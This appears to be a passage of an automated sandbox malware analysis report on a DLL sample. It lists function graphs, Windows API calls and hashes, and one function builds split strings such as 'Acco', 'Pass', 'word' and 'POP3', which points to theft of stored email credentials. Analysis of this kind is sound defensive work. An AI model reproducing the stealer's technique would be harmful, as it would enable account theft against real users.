                          control_flow_graph 327 10006c5f-10006c89 call 10005af6 call 10006d7e call 100069f3 334 10006c8b-10006c8d 327->334 335 10006c8f-10006ca4 call 100056d0 327->335 336 10006ce2-10006ce5 334->336 339 10006cd4 335->339 340 10006ca6-10006cbc call 10006e20 335->340 342 10006cd6-10006ce1 call 1000571e 339->342 343 10006cc1-10006cc7 340->343 342->336 345 10006ce6-10006cea 343->345 346 10006cc9-10006cce call 10006368 343->346 349 10006cf1-10006cfc 345->349 350 10006cec call 10007bbc 345->350 346->339 351 10006d13-10006d2d 349->351 352 10006cfe-10006d08 349->352 350->349 351->342 356 10006d2f-10006d36 351->356 352->351 355 10006d0a-10006d12 call 1000571e 352->355 355->351 356->342 358 10006d38-10006d4f call 100068c9 356->358 358->342 362 10006d51-10006d5b 358->362 362->342
                          APIs
                            • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                            • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                            • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                            • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                            • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                            • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                          • _free.LIBCMT ref: 10006CD7
                          • _free.LIBCMT ref: 10006D0D
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _free$ErrorLast_abort
                          • String ID:
                          • API String ID: 2991157371-0
                          • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                          • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                          • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                          • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                          Function 10005C45 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 363 10005c45-10005c6f 364 10005c71-10005c73 363->364 365 10005cda 363->365 366 10005c75-10005c77 364->366 367 10005c79-10005c7f 364->367 368 10005cdc-10005ce0 365->368 366->368 369 10005c81-10005c83 call 10005ce1 367->369 370 10005c9b 367->370 373 10005c88-10005c8b 369->373 372 10005c9d-10005c9f 370->372 374 10005ca1-10005caf GetProcAddress 372->374 375 10005cca-10005cd8 372->375 376 10005cbc-10005cc2 373->376 377 10005c8d-10005c93 373->377 378 10005cb1-10005cba call 100039a1 374->378 379 10005cc4 374->379 375->365 376->372 377->369 380 10005c95 377->380 378->366 379->375 380->370
                          APIs
                          • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8,00000000), ref: 10005CA5
                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc__crt_fast_encode_pointer
                          • String ID:
                          • API String ID: 2279764990-0
                          • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                          • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                          • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                          • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                          Function 10001EEC Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 383 10001eec-10001ef5 384 10001ef7-10001efa 383->384 385 10001f2a-10001f35 dllmain_crt_process_detach 383->385 387 10001f1c-10001f28 dllmain_crt_process_attach 384->387 388 10001efc-10001eff 384->388 386 10001f3a 385->386 389 10001f3b-10001f3c 386->389 387->386 390 10001f01-10001f04 388->390 391 10001f12 call 100023ec 388->391 393 10001f06-10001f09 390->393 394 10001f0b-10001f10 call 1000240b 390->394 395 10001f17-10001f1a 391->395 393->389 394->395 395->389
                          APIs
                          • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                          • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                          • String ID:
                          • API String ID: 3750050125-0
                          • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                          • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                          • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                          • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                          Function 100038E8 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                          • String ID:
                          • API String ID: 806969131-0
                          • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                          • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                          • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                          • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322

                          Non-executed Functions

                          Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                          • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                          • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                          • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                          Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                          • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                          • ExitProcess.KERNEL32 ref: 10004AEE
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                          • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                          • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                          • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                          Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID: .
                          • API String ID: 0-248832578
                          • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                          • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                          • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                          • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                          Function 1000724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                          • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                          • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                          • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                          Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000), ref: 10001D1B
                            • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10001D37
                            • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                          • _strlen.LIBCMT ref: 10001855
                          • _strlen.LIBCMT ref: 10001869
                          • _strlen.LIBCMT ref: 1000188B
                          • _strlen.LIBCMT ref: 100018AE
                          • _strlen.LIBCMT ref: 100018C8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _strlen$File$CopyCreateDelete
                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                          • API String ID: 3296212668-3023110444
                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                          • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                          • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                          Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: %m$~$Gon~$~F@7$~dra
                          • API String ID: 4218353326-230879103
                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                          • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                          • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                          Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 10007D06
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                          • _free.LIBCMT ref: 10007CFB
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 10007D1D
                          • _free.LIBCMT ref: 10007D32
                          • _free.LIBCMT ref: 10007D3D
                          • _free.LIBCMT ref: 10007D5F
                          • _free.LIBCMT ref: 10007D72
                          • _free.LIBCMT ref: 10007D80
                          • _free.LIBCMT ref: 10007D8B
                          • _free.LIBCMT ref: 10007DC3
                          • _free.LIBCMT ref: 10007DCA
                          • _free.LIBCMT ref: 10007DE7
                          • _free.LIBCMT ref: 10007DFF
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                          • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                          • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                          • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                          Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 100059EA
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 100059F6
                          • _free.LIBCMT ref: 10005A01
                          • _free.LIBCMT ref: 10005A0C
                          • _free.LIBCMT ref: 10005A17
                          • _free.LIBCMT ref: 10005A22
                          • _free.LIBCMT ref: 10005A2D
                          • _free.LIBCMT ref: 10005A38
                          • _free.LIBCMT ref: 10005A43
                          • _free.LIBCMT ref: 10005A51
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                          • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                          • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                          • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                          Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                          Download Yara Rule
                          APIs
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 10001D1B
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10001D37
                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                          • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                          • String ID:
                          • API String ID: 1454806937-0
                          • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                          • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                          • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                          • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                          Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetConsoleCP.KERNEL32 ref: 100094D4
                          • __fassign.LIBCMT ref: 1000954F
                          • __fassign.LIBCMT ref: 1000956A
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                          • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                          • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                          • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                          • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                          • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                          Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 1000339B
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                          • _ValidateLocalCookies.LIBCMT ref: 10003431
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                          • _ValidateLocalCookies.LIBCMT ref: 100034B1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                          • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                          • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                          • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                          Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                          • _free.LIBCMT ref: 100092AB
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 100092B6
                          • _free.LIBCMT ref: 100092C1
                          • _free.LIBCMT ref: 10009315
                          • _free.LIBCMT ref: 10009320
                          • _free.LIBCMT ref: 1000932B
                          • _free.LIBCMT ref: 10009336
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                          • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                          • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                          Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                          Download Yara Rule
                          APIs
                          • _strlen.LIBCMT ref: 10001607
                          • _strcat.LIBCMT ref: 1000161D
                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                          • lstrcatW.KERNEL32(?,?), ref: 1000165A
                          • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                          • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: lstrcatlstrlen$_strcat_strlen
                          • String ID:
                          • API String ID: 1922816806-0
                          • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                          • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                          • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                          • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                          Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcatW.KERNEL32(?,?), ref: 10001038
                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
